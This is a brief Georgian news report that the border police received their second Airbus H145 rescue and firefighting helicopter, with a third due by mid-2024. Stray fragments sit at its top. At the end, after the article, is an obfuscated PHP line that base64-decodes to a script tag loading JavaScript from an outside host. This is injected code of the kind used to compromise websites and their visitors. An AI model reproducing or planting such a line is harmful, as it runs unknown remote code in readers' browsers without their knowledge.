celsiusi
ავერსი შნაიდერი

 საქართველოს შინაგან საქმეთა სამინისტროს სასაზღვრო პოლიციას რიგით მეორე „H 145“ ვერტმფრენი შეემატა. მისი ოფიციალური გადმოცემა გერმანიაში, Airbus Helicopters-ის საწარმოში მოხდა.

შსს-ს ცნობით, ვერტმფრენი აღჭურვილია სამაშველო საშუალებებით და ასევე, გამორჩეულია სიმაღლეზე ოპერირების შესაძლებლობით. ახალი ბორტი სრულად დაკომპლექტებულია ხანძართან ბრძოლისა და სამთო-სამაშველო აღჭურვილობით.

„აღსანიშნავია, რომ ახალი, ევროპული ტიპის „H 145“ ვერტმფრენის საქართველოში ტრანსპორტირება ქართული ეკიპაჟის მიერ განხორციელდა, რომელთაც სრული გადამზადება გერმანიაში, Airbus Helicopters-ის​ სასწავლო აკადემიაში გაიარეს“, – აცხადებენ შსს-ში.

2022 წლის 19 დეკემბერს შინაგან საქმეთა სამინისტროში ხელშეკრულება გაფორმდა ფრანგულ კომპანია Airbus Helicopters-თან სამი „H145“ ვერტმფრენის შეძენასთან დაკავშირებით. მესამე ბორტის გადმოცემა ქართული მხარისთვის 2024 წლის ივნისამდე იგეგმება.

163
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");